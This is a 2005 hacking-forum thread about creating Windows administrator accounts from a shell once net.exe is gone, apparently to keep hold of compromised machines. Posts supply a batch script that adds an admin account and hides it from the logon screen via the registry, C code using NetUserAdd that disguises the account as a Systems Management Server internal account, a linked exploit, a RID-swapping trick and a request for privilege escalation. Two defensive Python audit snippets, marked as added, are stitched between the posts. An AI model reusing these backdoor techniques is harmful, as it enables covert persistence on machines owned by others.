Full Version: Adding Users In Windows
Hmmm, is it possible to add Admin-Users with reg-files and regedit from shell? Even searched on google for it...
Greetings
Not using reg files as far as I know - it has to be done with the net user command
I think it is possible: run regedit in the context of LOCALSYSTEM and look at the new keys that were previously invisible.
Remember that the SAM is actually part of the registry hive.
As far as I know, hidden admin users can be added there (or was it the way of hiding existing admin users from the logon screen?)
Maybe reversing the CPL file for user controls should do the trick...
Hmmm, that all won't help me :/
I think it's not possible... The problem is, what can I do when net.exe is damaged or nonexistent?

QUOTE(PSR @ Apr 26 2005, 12:12 PM)
Hmmm, that all won't help me :/ I think it's not possible... The problem is, what can I do when net.exe is damaged or nonexistent?

When net.exe is damaged there should be (depending on the OS) a net1.exe. You can also use that. If you deleted net.exe, maybe by mistake, the newer Windows versions regenerate it from %windir%\system32\dllcache\. If you think it's damaged you can delete it and it should copy a working one from %windir%\system32\dllcache\. I only tested the regenerating on Windows XP! I don't know if it works on older versions too. If you have WinXP or later and you don't have a net.exe in dllcache, it may be that your system is corrupted.

Script kiddies / "hackers": you should check whether you can find files like ftp.exe, tftp.exe, rcp.exe, which these kiddies also delete a lot of the time. The best way is to search for them in %windir%\system32\dllcache\ when you have a current OS like XP. You have to change the view settings and show hidden files and system files to see it! It can also be that they installed a rootkit on your machine and made files such as ftp.exe hidden.... Then maybe use tools like RootkitRevealer from Sysinternals (Google will do the job).

Sorry for my poor English, still learning. I hope I could help you a bit....
Maybe I'm wrong, but if net.exe is corrupted you can always start the sfc check:
SFC /SCANNOW
Then if the file integrity is corrupted the system will prompt you to insert the CD to fix the bad files.
He is explicitly saying "from shell",
so surely SFC /scannow will prompt the unknowing hacked user to insert his XP CD!!!! That would be a nice thing to do
That seems like a "stro maker" question: this guy has got access to an already hacked computer. If net.exe, net1.exe, ftp.exe, tftp.exe are not in place, that could be for two reasons:
1) The sysop knows what script kiddies use to get into their boxes
2) That box is already hacked and protected by its "L33T H4X0R"
If it is the first one (I doubt it): well, you've tried; after some time trying you will have to learn that you can lose sometimes, this is a "hacker way to do" too. Then you will try harder on the next one after "googling" all week long.
If it's the second: hey, you are breaking the "almost rulez" of stro-making; re-hacking is lame and punished by many people out there, be careful "stealing" others' HQ. Also your account on GSO could be deleted for that.
But I guess you will explain to us that it is your personal computer for which you lost the key

QUOTE(KoNh @ Apr 27 2005, 12:09 AM)
That seems like a "stro maker" question: this guy has got access to an already hacked computer. If net.exe, net1.exe, ftp.exe, tftp.exe are not in place, that could be for two reasons:
1) The sysop knows what script kiddies use to get into their boxes
2) That box is already hacked and protected by its "L33T H4X0R"
If it is the first one (I doubt it): well, you've tried; after some time trying you will have to learn that you can lose sometimes, this is a "hacker way to do" too. Then you will try harder on the next one after "googling" all week long.
If it's the second: hey, you are breaking the "almost rulez" of stro-making; re-hacking is lame and punished by many people out there, be careful "stealing" others' HQ. Also your account on GSO could be deleted for that.
But I guess you will explain to us that it is your personal computer for which you lost the key

I also thought it could be a stromaker/rehacker question... But I also thought it could be that he got hacked..... Or he deleted it, but then the OS will regenerate it. But read my first reply for more info.
Not directly with a reg file (but I'm reading that this was not really the request), but you can find some good examples here to do the job with a .vbs:
hxxp://www.codecomments.com/archive305-2004-9.html
Please read carefully the code in the various threads (search 'ADD' in the title). Hope something may help you.
RFlash

CODE
http://www.governmentsecurity.org/forum/index.php?act=Attach&type=post&id=2814

Found this exploit a while back.. may still work. Not sure if it is what you are really looking for but.. you can also change the hex dec from the admin account to your user's account, possibly.. like user hex= 0x123 and administrator hex= 0x3ea. You will have to find the number for the account you are looking for. Also if you change that hexdec you will need to log in as the Administrator with the USER's password. If it still works....
kv-
what about writing a program yourself which can add users like net.exe can? I'm sure that would solve your problem.
Yep scorpion,
it will be the best way to code a tool that does that job, but what's the API he should use? Give him some info and I'm sure he's gonna code it himself.

QUOTE
That seems a "stro maker" question, this guy has got access into an already hacked computer, if net.exe, net1.exe ftp.exe tftp.exe are not in place that could be for two reasons:

You forgot rcp, echo and debug

NetUserAdd is the most important one. It is located in netapi32.dll; open netapi32.dll with a program like PE Explorer to look at the functions it exports. It has a lot more interesting APIs.
You can add a hidden admin on a machine via .bat; here is the code!
CODE
net user HIDDEN-USER /add
net localgroup administrators Raffye /add
@echo Windows Registry Editor Version 5.00>%SystemRoot%\tmp.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>>%SystemRoot%\tmp.reg
@echo "Raffye"=dword:00000000>>%SystemRoot%\tmp.reg
regedit /s %SystemRoot%\tmp.reg
Del %SystemRoot%\tmp.reg

I got a little cmd line prog that puts an invisible user in the administrator group (no matter what the name of the administrator group is). You must be administrator to do that. Don't know if I should upload it here or not; msg me if you want!!
syntax:
Hideuser.exe username pass
or Hideuser.exe username -------> You'll be asked for a pass
or Hideuser.exe --------> You'll be asked for a username and a pass
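Added example, not part of the thread: the batch file above hides an account by writing a zero DWORD under SpecialAccounts\UserList, which is also what an audit can look for. The Python below parses an exported copy of that key and flags hidden names that are also local administrators; the sample export, the member list and the function names are constructed for illustration.

```python
import re

# Key written by the batch file in the thread.
USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT"
                r"\CurrentVersion\Winlogon\SpecialAccounts\UserList")
DWORD_VALUE = re.compile(r'^"((?:[^"\\]|\\.)*)"=dword:([0-9a-fA-F]{8})$')

# Constructed sample of a .reg export (decode the real file as UTF-16 first).
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"Raffye"=dword:00000000
"svc_backup"=dword:00000000
"kiosk"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
'''
# Constructed sample: members of the local Administrators group.
SAMPLE_ADMINS = ["Administrator", r"WORKSTATION\Raffye"]


def hidden_accounts(reg_text):
    """Names under UserList whose value is 0 (hidden from the logon screen)."""
    hidden, in_key = [], False
    for raw in reg_text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            # Registry key names are case-insensitive.
            in_key = line[1:-1].lower() == USERLIST_KEY.lower()
            continue
        match = DWORD_VALUE.match(line) if in_key else None
        if match and int(match.group(2), 16) == 0:
            hidden.append(match.group(1))
    return hidden


def audit(reg_text, admin_members, expected_hidden=()):
    """Return (name, severity) for hidden accounts not on the allow-list."""
    admins = {m.split("\\")[-1].lower() for m in admin_members}
    allowed = {name.lower() for name in expected_hidden}
    findings = []
    for name in hidden_accounts(reg_text):
        if name.lower() in allowed:
            continue
        # Hidden AND administrator is the combination the batch file creates.
        findings.append((name, "high" if name.lower() in admins else "review"))
    return findings
```
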
I coded this long ago, but I am pretty sure it worked...
Can't remember which permissions the new user had though... that you'll have to look into
CODE
#pragma hdrstop
#ifdef __BORLANDC__
#include <condefs.h>                 // Borland C++Builder only
#endif
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <lm.h>

#define DEBUG 0

// Pointers to the netapi32.dll functions; the NetAPI uses the
// NET_API_FUNCTION (stdcall) calling convention
typedef NET_API_STATUS (NET_API_FUNCTION *ptrNetUserAdd)(LMSTR, DWORD, LPBYTE, LPDWORD);
typedef NET_API_STATUS (NET_API_FUNCTION *ptrNetUserGetInfo)(LPWSTR, LPWSTR, DWORD, LPBYTE *);

#pragma argsused
int main(int argc, char *argv[])
{
    HINSTANCE handleDLL;             // Handle to DLL
    ptrNetUserAdd NetUserAdd;
    ptrNetUserGetInfo NetUserGetInfo; // declared in the original post, never used
    USER_INFO_1 ui;
    DWORD dwError = 0;               // index of the first invalid parameter
    NET_API_STATUS nStatus;
    WCHAR usrName[256];
    WCHAR usrPassWord[256];

#if DEBUG
    argc = 3;
    argv[1] = "Erion";
    argv[2] = "testPass";
#endif

    if (argc != 3)
    {
        printf("Usage: %s UserName Password\n", argv[0]);
        exit(1);
    }

    printf("\n%s coded by Erion for Minted\n\n", argv[0]);

    handleDLL = LoadLibraryA("netapi32.dll");   // Load the desired DLL
    if (handleDLL == NULL)
    {
        printf("LoadLibrary() failed for netapi32.dll\n");
        return 1;
    }

    // Search the address of the function
    NetUserAdd = (ptrNetUserAdd)GetProcAddress(handleDLL, "NetUserAdd");
    if (NetUserAdd)
    {
        // Convert the strings from ASCII to UNICODE; the call fails (returns 0)
        // instead of overflowing when an argument does not fit in the buffer
        if (!MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[1], -1, usrName, 256) ||
            !MultiByteToWideChar(CP_ACP, MB_PRECOMPOSED, argv[2], -1, usrPassWord, 256))
        {
            printf("User name or password is too long or invalid\n");
            FreeLibrary(handleDLL);
            return 1;
        }

        memset(&ui, 0, sizeof(ui));
        ui.usri1_name = usrName;
        ui.usri1_password = usrPassWord;
        ui.usri1_priv = USER_PRIV_USER;
        ui.usri1_home_dir = NULL;
        ui.usri1_comment = L"DO NOT MODIFY. Systems Management Server Internal Account";
        ui.usri1_flags = UF_SCRIPT | UF_DONT_EXPIRE_PASSWD;
        ui.usri1_script_path = NULL;

        // call the function
        nStatus = NetUserAdd(NULL, 1, (LPBYTE)&ui, &dwError);
        if (nStatus != NERR_Success)
        {
            switch (nStatus)
            {
                case ERROR_ACCESS_DENIED: printf("ACCESS DENIED.\n"); break;
                case NERR_InvalidComputer: printf("The computer name is invalid.\n"); break;
                case NERR_NotPrimary: printf("The operation is allowed only on the primary domain controller of the domain.\n"); break;
                case NERR_GroupExists: printf("The group already exists.\n"); break;
                case NERR_UserExists: printf("The user account already exists.\n"); break;
                case NERR_PasswordTooShort: printf("The password is shorter than required.\n"); break;
                // print the status code itself; dwError is only the parameter index
                default: printf("Unknown Error %lu (parameter index %lu)!\n",
                                (unsigned long)nStatus, (unsigned long)dwError); break;
            }
        }
        else
            printf("User %s added successfully\n", argv[1]);
    }
    else
        printf("Couldn't get the NetUserAdd Address\n");

    FreeLibrary(handleDLL);          // only reached with a valid handle
    return 0;
}
ooops, posted it twice
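Added example, not part of the thread: an account created through NetUserAdd never runs net.exe, so process or command-line monitoring misses it, but with account-management auditing enabled the Security log still records the creation and any group change. The Python below correlates those two events over constructed records; field names follow the Windows event schema, and the sample SIDs, users and the 10-minute window are assumptions.

```python
from datetime import datetime, timedelta

ADMINS_SID = "S-1-5-32-544"            # well-known SID of BUILTIN\Administrators
CREATED, ADDED_TO_LOCAL_GROUP = 4720, 4732   # 624 and 636 on Windows 2000/XP
DOM = "S-1-5-21-1111111111-2222222222-3333333333"   # constructed machine SID

# Constructed sample records, already parsed from the Security log.
SAMPLE_EVENTS = [
    {"TimeCreated": "2024-01-10T10:00:00", "EventID": 4720, "TargetSid": DOM + "-1005",
     "TargetUserName": "olduser", "SubjectUserName": "helpdesk"},
    {"TimeCreated": "2024-01-15T03:12:40", "EventID": 4720, "TargetSid": DOM + "-1009",
     "TargetUserName": "Raffye", "SubjectUserName": "bob"},
    {"TimeCreated": "2024-01-15T03:12:41", "EventID": 4732, "TargetSid": ADMINS_SID,
     "MemberSid": DOM + "-1009", "SubjectUserName": "bob"},
    {"TimeCreated": "2024-01-15T09:00:00", "EventID": 4720, "TargetSid": DOM + "-1010",
     "TargetUserName": "intern", "SubjectUserName": "helpdesk"},
    {"TimeCreated": "2024-01-15T09:00:05", "EventID": 4732, "TargetSid": "S-1-5-32-545",
     "MemberSid": DOM + "-1010", "SubjectUserName": "helpdesk"},   # Users group
    {"TimeCreated": "2024-01-15T11:00:00", "EventID": 4732, "TargetSid": ADMINS_SID,
     "MemberSid": DOM + "-1005", "SubjectUserName": "helpdesk"},
]


def new_admins(events, window=timedelta(minutes=10)):
    """Accounts created and then added to Administrators within `window`."""
    created = {}                       # account SID -> (time, name, creator)
    hits = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        when = datetime.fromisoformat(ev["TimeCreated"])
        if ev["EventID"] == CREATED:
            created[ev["TargetSid"]] = (when, ev["TargetUserName"], ev["SubjectUserName"])
        elif ev["EventID"] == ADDED_TO_LOCAL_GROUP and ev["TargetSid"] == ADMINS_SID:
            # In 4732, TargetSid is the group and MemberSid is the account added.
            seen = created.get(ev["MemberSid"])
            if seen and when - seen[0] <= window:
                hits.append({"account": seen[1], "created_by": seen[2],
                             "promoted_by": ev["SubjectUserName"],
                             "seconds": int((when - seen[0]).total_seconds())})
    return hits
```
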
I have an account on another comp I just got, but there I only got an account with lots of limits. I want to change this, but how do I do this, 'cause I don't have the pass or name of the ADMIN account..
(the comp runs on win2000)